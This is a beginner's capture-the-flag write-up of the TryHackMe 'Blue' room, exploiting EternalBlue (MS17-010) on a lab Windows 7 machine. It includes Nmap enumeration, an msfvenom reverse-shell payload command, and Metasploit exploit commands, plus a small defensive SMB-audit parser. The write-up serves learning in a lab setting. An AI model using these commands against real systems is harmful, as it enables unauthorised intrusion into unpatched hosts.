Deploy & hack into a Windows machine, leveraging common misconfiguration issues. This room is not meant to be a boot2root CTF; rather, it is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice, as the process here is meant to be beginner-focused.

. . .

Introduction

https://tryhackme.com/room/blue

The virtual machine used in this room (Blue) can be downloaded for offline usage from https://darkstar7471.com/resources.html

. . .

Scanning & Enumeration

As soon as we deploy the machine, we are provided with the Target IP: 10.10.222.170

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 02:41 IST
Nmap scan report for 10.10.222.170
Host is up (0.55s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 4 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h40m05s, deviation: 2h53m12s, median: 5s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:6c:9a:f9:da:c4 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-01T16:14:09-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-01T21:14:09
|_  start_date: 2020-08-01T20:18:16
TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   260.90 ms 10.4.0.1
2   ... 3
4   515.55 ms 10.10.222.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 215.37 seconds
screenshot: Services running; Samba enumeration scripts' result in nmap

This Nmap scan tells us that an SMB file-sharing service (shown as microsoft-ds) is running on the server and that the target's operating system is Windows 7. We also observe multiple RPC services up and running, and the hostname JON-PC suggests that there is a user named Jon.
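As an added defender-side example (not part of the original post), here is a small Python parser for the Nmap host-script block above that extracts the SMB hardening gaps the scan already reveals: signing disabled, a guest session accepted, and an unpatched-looking Windows 7 SP1 banner. The sample lines are constructed from the scan output shown above.

```python
# Constructed sample: the smb-* host-script lines from the Nmap scan above,
# trimmed to the entries the checks below look at.
SAMPLE_NSE = """\
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

def parse_nse_output(text):
    """Turn '| script:' / '|   key: value' lines into {script: {key: value}}.
    '|_' (last line of a block) is read as '| ', so indentation alone
    separates script headers (1 space) from their entries (3+ spaces)."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        rest = line[1:]
        if rest.startswith("_"):
            rest = " " + rest[1:]
        indent = len(rest) - len(rest.lstrip(" "))
        content = rest.strip()
        if indent == 1 and content.endswith(":"):
            current = content[:-1]          # start of a new script block
            scripts[current] = {}
        elif current is not None and content:
            key, _, value = content.partition(":")   # lines without ':' keep value ""
            scripts[current][key.strip()] = value.strip()
    return scripts

def smb_findings(scripts):
    """Defender-facing findings derived from the parsed script results."""
    findings = []
    smb1 = scripts.get("smb-security-mode", {})
    if smb1.get("message_signing", "").startswith("disabled"):
        findings.append("SMB1 message signing disabled (relay/MITM exposure)")
    if smb1.get("account_used") == "guest":
        findings.append("SMB1 accepted a guest (anonymous) session")
    smb2 = scripts.get("smb2-security-mode", {})
    if any("not required" in key.lower() for key in smb2):
        findings.append("SMB2 message signing enabled but not required")
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    if os_name.startswith("Windows 7"):
        findings.append("Windows 7 SP1 host: verify the MS17-010 patch is installed")
    return findings
```

Run `smb_findings(parse_nse_output(SAMPLE_NSE))` to get the four findings for this host; feeding it the host-script section of your own `nmap -sV -sC` output works the same way.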

Service Enumeration

Since there is no other obvious attack surface, we proceed with enumerating SMB.

We know from our Nmap scan the exact SMB service banner: Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Let us enumerate the service:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $target
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 02:57 IST
Nmap scan report for 10.10.222.170
Host is up (0.59s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\10.10.222.170\ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.222.170\C$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.222.170\IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 433.85 seconds

It takes a lot of time :P and we do not see many results.

Let's try to see if the service version is vulnerable in itself. Sometimes we may even get boxes that do not need a lot of enumeration. Let's see if this is one of them.

. . .

Vulnerability Analysis

Let us look up the version that we have for this SMB service.

screenshot

A simple Google search gives us two top results that are really important:
1. Exploit-DB, which hosts the public exploits.
2. Rapid7, the company behind Metasploit, which means there should be a ready-to-use module in Metasploit.

screenshot

Checking Exploit-DB tells us that this is the famous EternalBlue exploit (MS17-010), the one used by the WannaCry ransomware (https://en.wikipedia.org/wiki/EternalBlue).

We can do this in two ways:
1. Simply use Metasploit and be done.
2. The harder way: exploit it manually.

. . .

Exploitation

Let us first go the harder way; the exploit is Python code.

When we try running the code with python3 we get "module not found" errors; we can install those modules simply with pip3 install <package_name>, except for 'mysmb'.

So I started looking for a blog that had mentioned this, and I found https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/

The fix is simple: we need to download mysmb.py from GitHub and keep it in the same directory as the exploit code. To download the file, run

wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

Once we have that, let us try to run it without any parameters.

We get a usage message saying that we need to provide an IP and a pipe name. We know the IP, but I am clueless about what this pipe_name is all about. Let's Google.

screenshot: Google search results

So far so good: now we know what a pipe name is, and we need to figure out how to get these names!

screenshot

There is a Metasploit module that can help us, but we are trying the harder way, so let us try the first result.

screenshot

Looks like even this new script uses Metasploit (in one way or another).
I am not sure if this is allowed in the OSCP, so I tried a little more to find some other tool and finally found this: https://github.com/p33kab00/pipe-scan. At this point, I am not sure if this is going to work.

I know this could have been a lot simpler if I had used Metasploit, but since I am learning and have ample time, let's do this!

I found no help with the script :(

screenshot

So I started reading a little more, and I found this (on https://bestestredteam.com/2019/03/15/using-smbclient-to-enumerate-shares/).

screenshot

Now it clicked: we saw so many RPC services running on different ports, and in the script we see that some 42 names are checked! I quickly opened the code and found this!

I am sure we might find a hit on one of the RPC ports; let's try that!

List of MSRPC Ports on the target machine: {135,49152,49153,49154,49158,49160}

Let us run the script against port 135. It feels like it is taking generations… Losing my patience 😠

So I thought of checking for pipe names using Metasploit (what if the scans tampered with the system and it is not running properly?)

use auxiliary/scanner/smb/pipe_auditor
set RHOSTS <target-ip>
screenshot

Clearly, something is not right …

So I then thought of providing the names of all 42 named pipes that we had. Sadly, even this did not work out.

I finally recalled that there is a machine on HTB named Blue, and Rana Khalil's blog must have a solution that does not use Metasploit.

After reading this, I thought of proceeding with the same approach.

screenshot: A list of things that I missed!

I had only downloaded mysmb.py; the other two steps …


Let us generate the payload:

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.4.9.255 LPORT=4444 > eternal-blue.exe

Now we need to check for credentials: enum4linux -a <target-ip>

We did not get any info suggesting that guest login is allowed, so I tried to manually add the user using the '-u' flag.

screenshot

Hence, we do not need to add a username to the script.

screenshot

I guess there is some error with the remote host. But before digging into that, let us try Metasploit once and see if we can get access.

msfconsole -q 
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target-ip>
set LHOST <our-ip>
run

Surprisingly, we get the meterpreter session!

Flag 1 — User directory

screenshot

Flag 2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

A little bit of Googling and we find out that the directory is 'C:\Windows\System32\config'.

. . .

Parting Thoughts

I am not sure why the other methods did not work out. If I find another way, I shall update this blog; in the meantime, if I need to exploit EternalBlue ASAP, I would use Metasploit :P

P.P.S. If any of you reading this can help me out here, it would be amazing. Thank you.

Note to beginners (like me): it is okay to keep trying. I am not blogging the perfect solution; I am blogging my experience with different boxes.